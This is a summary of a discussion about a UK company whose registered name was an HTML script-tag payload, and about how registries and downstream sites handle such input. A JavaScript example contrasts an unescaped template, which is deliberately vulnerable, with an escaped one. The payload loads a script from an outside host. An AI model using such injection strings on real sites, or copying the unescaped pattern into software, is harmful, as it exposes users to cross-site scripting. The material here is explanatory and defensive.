Company named "><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD" forced to change it (2020)

Company name, masking, and legal changes

  • Original company with an HTML <script> tag in its name was later renamed to “THAT COMPANY WHOSE NAME USED TO CONTAIN HTML SCRIPT TAGS LTD” and then dissolved.
  • Historical records now show a placeholder: [NAME AVAILABLE ON REQUEST FROM COMPANIES HOUSE], which replaces the actual prior name everywhere, including postal mail, making official letters confusing.
  • A new UK law forbids registering a company with a name that, in the Secretary of State’s opinion, “consists of or includes computer code.”

Security concerns & data consumers

  • Concern that this indicates XSS/sanitization problems, either in Companies House or in third-party consumers of its data.
  • Some argue the main risk is for downstream users who embed company names in web pages without escaping.
  • Others say the official site itself is “fine”, but many external users “don’t parse it properly.”
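
The downstream-consumer risk described above, as an added example that is not from the discussion or from Companies House: a constructed page template that embeds the company name from this page's title once without escaping and once with output encoding. The record shape, the template and all function names are assumptions made for illustration.

```javascript
// Constructed sample record; the name is the one quoted in this page's title.
const record = { name: '"><SCRIPT SRC=HTTPS://MJT.XSS.HT> LTD' };

// The five characters that are significant in HTML text and quoted attributes.
const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
};

// Encode data at the point of output so it can only ever be read as text.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Fragile consumer: interpolates registry data straight into markup.
// The leading "> in the name closes the value attribute and the input tag.
function renderUnsafe(rec) {
  return `<input name="company" value="${rec.name}"><h1>${rec.name}</h1>`;
}

// Robust consumer: same template, same data, encoded before interpolation.
function renderSafe(rec) {
  const n = escapeHtml(rec.name);
  return `<input name="company" value="${n}"><h1>${n}</h1>`;
}

// Demo-only check: list tag names in the output that the template did not
// write itself. This is a crude regex scan, not an HTML parser or a filter.
function injectedTags(html) {
  const tags = html.match(/<\/?[a-z][a-z0-9]*/gi) || [];
  return tags
    .map((t) => t.replace(/[<\/]/g, '').toLowerCase())
    .filter((t) => !['input', 'h1'].includes(t));
}

console.log('unsafe:', renderUnsafe(record), injectedTags(renderUnsafe(record)));
console.log('safe:  ', renderSafe(record), injectedTags(renderSafe(record)));
```

The stored name is identical in both cases; only the consumer's output step differs. In a browser, assigning the name through `textContent` or `setAttribute` avoids building markup from strings at all.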

Debate: banning ‘code’ vs fixing software

  • One side: blocking such names is pragmatic “defense in depth,” given many real-world systems are fragile; easier to constrain input than secure every consumer.
  • Other side: this normalizes bad practices; systems should handle arbitrary text safely. Banning “code-like” strings is seen as a superficial fix that doesn’t solve injection issues.
  • Some propose official “honeypot” names containing benign code to force consumers to be robust. Others object that registries shouldn’t intentionally ship weaponized test inputs.

Related exploits and humorous abuses

  • Many examples of SQL/XSS-style names: car license plates (“NULL”), personal names (“Little Bobby Tables”-style), Polish companies with DROP TABLE in names.
  • Anecdotes of barcodes/QR codes triggering antivirus via the EICAR test string, and early-web promotions or auction systems being broken by script-like usernames.

Company registration & bureaucracy

  • UK company formation described as cheap and fast, though fees have risen.
  • Non-residents can register UK companies using a local mailing address; dormant companies mainly incur small annual filing costs.

Law, ambiguity, and human judgment

  • Discussion that law is intentionally not a regex: it defers to human judgment (“in the opinion of the Secretary of State”) rather than fully formal rules.
  • Long subthread on law vs code, ambiguity, precedent, and how imprecise legal language is both necessary and abusable.

Technical tangents

  • RSS vs Atom: ambiguity over whether <title> should be treated as HTML or plaintext caused feeds/readers to mangle the article title with <script> in it.
  • Broader reflection that correctly handling arbitrary strings, escaping, and encodings remains surprisingly error-prone in practice.